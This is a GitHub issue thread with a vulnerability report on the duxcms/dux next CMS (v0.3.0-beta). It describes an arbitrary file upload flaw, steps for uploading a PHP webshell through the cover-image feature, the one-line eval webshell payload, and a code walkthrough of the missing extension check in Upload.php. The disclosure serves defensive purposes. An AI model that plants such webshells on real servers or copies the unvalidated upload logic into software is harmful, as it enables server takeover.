duxphp
commented
3 months ago Thank you for your feedback.
Closed czheisenberg closed 3 months ago
duxphp
commented
3 months ago Thank you for your feedback.
duxphp
commented
3 months ago The feedback has been updated:
Default execution format has now been added and must be explained in the help documentation.
czheisenberg
commented
3 months ago The feedback has been updated:
- When uploading, cloud storage is generally used. Local storage requires self-configuration with storage.yaml to filter formats.
- Scripts cannot be executed properly when uploaded on cloud storage.
- Before going live, users need to configure the storage.yaml file themselves; this bug only affects the test environment.
Default execution format has now been added and must be explained in the help documentation.
Yes, cloud storage is generally used. Be careful not to disclose cloud storage keys when using cloud storage procedures.
Company name: 湖南聚匠信息科技有限公司 Project official website: https://www.dux.cn/. Project address: https://github.com/duxweb/duxcms. Project name: duxcms or dux next. Affected version: v0.3.0-beta
Vulnerability description: There is an arbitrary file upload vulnerability in the duxcms or dux next background management system, through which an attacker can expand the attack to gain server information and privileges.
准备工作:
Preparatory work:
Select the newly created category (I am test here). Write any title to occupy a space.
Click 设置——>添加封面 Click Settings in the upper right corner-- > add cover
Upload a webshell with the content <? php eval ($_ POST [1]);? >
View burp suite
Pass in parameters and execute the command successfully
Vulnerability code.
Navigate to: App/Tools/Handlers/Upload.php Line 23-Line 70
Line 32 gets all the mime values. Line 33 gets the value local. The value obtained in line 34 is empty, so it is false. Line 36 code to get the contents of the uploaded file. The corresponding content of uploading Trojan is <? php eval ($_ POST [1]);? >. Line 37 to get the suffix of the uploaded file. The corresponding content of uploading Trojan is: .php. Line 38 to get the mime value of the uploaded file. The corresponding values for uploading Trojans are: application/octet-stream. The value of if (! $extension) in line 39 is false. So the corresponding block of code for if is not executed.
The return value of if ($ext & &! in_array ($extension, $ext) in line 42 is false and the corresponding code block is not executed. In_array ($extension, $ext) compares the suffix ".php" of the obtained uploaded file to $ext on line 34: whether $extension is in $ext, yes returns true, otherwise returns false, and $ext is empty, then the return value of in_array ($extension, $ext) is false. So! the return value of in_array ($extension, $ext) is true. But $ext is empty, and the final return value for the & & operation is false. The file format is not supported. This judgment was not carried out at all. Finally, line 48, write the resulting new file name and suffix stitching to the local file. The file upload is realized. To sum up: file upload here does not do any defense, just get the corresponding mime type, the corresponding suffix, and finally generate a random file name. Then the attacker can construct special code to achieve the purpose of the attack.